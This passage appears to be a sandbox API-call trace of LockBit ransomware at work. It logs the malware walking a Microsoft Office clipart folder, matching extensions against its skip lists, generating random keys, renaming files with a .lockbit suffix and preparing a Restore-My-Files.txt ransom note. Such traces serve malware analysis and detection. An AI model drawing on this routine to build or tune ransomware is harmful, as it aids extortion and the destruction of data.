(lpLibFileName="bcrypt.dll") returned 0x753f0000 [0156.384] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0156.384] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0156.384] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0156.385] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0156.385] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0156.385] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0156.909] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0294991.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0294991.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0156.909] malloc (_Size=0xa6) returned 0x1fa2ed8 [0156.909] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0156.911] free (_Block=0x1fa2ed8) [0156.911] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0294991.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0156.911] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0156.911] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0156.911] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x566b3c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x21b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0295069.WMF", cAlternateFileName="")) returned 1 [0156.911] lstrcmpiW (lpString1=".", lpString2="J0295069.WMF") returned -1 [0156.911] lstrcmpiW (lpString1="..", lpString2="J0295069.WMF") returned -1 [0156.911] PathFindExtensionW (pszPath="J0295069.WMF") returned=".WMF" [0156.911] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0156.911] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0156.911] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0156.912] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0156.912] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0156.912] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0156.912] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0156.912] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0156.912] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0156.912] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0156.912] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0156.912] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0156.912] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0156.912] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0156.912] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0156.912] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0156.912] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0156.912] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0156.912] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0156.912] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0156.912] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0156.912] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0156.912] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0156.912] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0156.912] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0156.912] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0156.912] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0156.912] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0156.913] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0156.913] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0156.913] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0156.913] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0156.913] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0156.913] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0156.913] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0156.913] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0156.913] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0156.913] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0156.913] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0156.913] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0156.913] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0156.913] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0156.913] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0156.913] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0156.913] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0156.913] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0156.913] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0156.913] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0295069.WMF") returned 1 [0156.913] lstrcmpiW (lpString1="ntldr", lpString2="J0295069.WMF") returned 1 [0156.913] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0295069.WMF") returned 1 [0156.913] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0295069.WMF") returned -1 [0156.913] lstrcmpiW (lpString1="autorun.inf", lpString2="J0295069.WMF") returned -1 [0156.913] lstrcmpiW (lpString1="thumbs.db", lpString2="J0295069.WMF") returned 1 [0156.913] lstrcmpiW (lpString1="iconcache.db", lpString2="J0295069.WMF") returned -1 [0156.913] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0156.914] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0295069.WMF") returned=".WMF" [0156.914] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0156.914] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0156.914] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0156.914] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0156.914] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0156.914] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0156.914] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0156.914] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0156.914] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0156.914] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0156.914] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0156.914] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0156.914] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0156.914] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0156.914] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0156.914] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0156.914] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0156.914] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0156.914] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0156.914] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0156.914] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0156.914] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0156.914] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0156.915] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0156.915] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0156.915] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0156.915] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0156.915] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0156.915] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0295069.WMF.lockbit") returned 72 [0156.915] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0295069.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0295069.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0156.916] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0156.916] malloc (_Size=0x40068) returned 0x3df0008 [0156.916] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=8626) returned 1 [0156.916] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0156.917] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0156.917] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0156.917] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0156.917] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0156.918] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0156.918] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0156.922] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0295069.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0295069.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0156.922] malloc (_Size=0xa6) returned 0x1fa2ed8 [0156.922] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0156.923] free (_Block=0x1fa2ed8) [0156.923] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0295069.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0156.923] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0156.923] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0156.923] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6613c7b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xe42c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0296277.WMF", cAlternateFileName="")) returned 1 [0156.923] lstrcmpiW (lpString1=".", lpString2="J0296277.WMF") returned -1 [0156.923] lstrcmpiW (lpString1="..", lpString2="J0296277.WMF") returned -1 [0156.923] PathFindExtensionW (pszPath="J0296277.WMF") returned=".WMF" [0156.923] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0156.923] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0156.924] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0156.924] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0156.924] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0156.924] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0156.924] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0156.924] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0156.924] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0156.924] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0156.924] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0156.924] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0156.924] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0156.924] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0156.924] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0156.924] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0156.924] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0156.924] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0156.924] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0156.924] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0156.924] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0156.924] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0156.924] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0156.924] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0156.924] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0156.924] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0156.924] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0156.924] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0156.924] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0156.924] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0156.924] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0156.925] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0156.925] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0156.925] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0156.925] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0156.925] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0156.925] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0156.925] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0156.925] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0156.925] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0156.925] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0156.925] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0156.925] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0156.925] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0156.925] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0156.925] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0156.925] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0156.925] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0296277.WMF") returned 1 [0156.925] lstrcmpiW (lpString1="ntldr", lpString2="J0296277.WMF") returned 1 [0156.925] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0296277.WMF") returned 1 [0156.925] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0296277.WMF") returned -1 [0156.925] lstrcmpiW (lpString1="autorun.inf", lpString2="J0296277.WMF") returned -1 [0156.925] lstrcmpiW (lpString1="thumbs.db", lpString2="J0296277.WMF") returned 1 [0156.925] lstrcmpiW (lpString1="iconcache.db", lpString2="J0296277.WMF") returned -1 [0156.925] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0156.925] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0296277.WMF") returned=".WMF" [0156.925] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0156.925] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0156.925] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0156.925] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0156.926] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0156.926] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0156.926] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0156.926] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0156.926] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0156.926] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0156.926] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0156.926] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0156.926] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0156.926] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0156.926] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0156.926] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0156.926] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0156.926] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0156.926] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0156.926] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0156.926] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0156.926] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0156.926] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0156.926] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0156.926] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0156.926] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0156.926] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0156.927] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0156.927] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0296277.WMF.lockbit") returned 72 [0156.927] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0296277.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0296277.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0156.928] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0156.928] malloc (_Size=0x40068) returned 0x3df0008 [0156.928] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=58412) returned 1 [0156.928] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0156.928] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0156.928] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0156.928] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0156.929] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0156.929] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0156.929] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0156.933] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0296277.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0296277.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0156.933] malloc (_Size=0xa6) returned 0x1fa2ed8 [0156.933] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0156.935] free (_Block=0x1fa2ed8) [0156.935] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0296277.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0156.935] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0156.935] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0156.935] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6613c7b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1088e, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0296279.WMF", cAlternateFileName="")) returned 1 [0156.935] lstrcmpiW (lpString1=".", lpString2="J0296279.WMF") returned -1 [0156.935] lstrcmpiW (lpString1="..", lpString2="J0296279.WMF") returned -1 [0156.936] PathFindExtensionW (pszPath="J0296279.WMF") returned=".WMF" [0156.936] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0156.936] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0156.936] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0156.936] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0156.936] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0156.936] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0156.936] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0156.936] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0156.936] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0156.936] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0156.936] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0156.936] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0156.936] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0156.936] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0156.936] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0156.936] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0156.936] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0156.936] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0156.936] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0156.936] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0156.936] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0156.936] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0156.936] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0156.937] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0156.937] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0156.937] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0156.937] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0156.937] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0156.937] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0156.937] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0156.937] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0156.937] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0156.937] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0156.937] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0156.937] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0156.937] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0156.937] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0156.937] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0156.937] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0156.937] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0156.937] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0156.937] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0156.937] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0156.937] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0156.937] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0156.937] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0156.937] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0156.937] lstrcmpiW 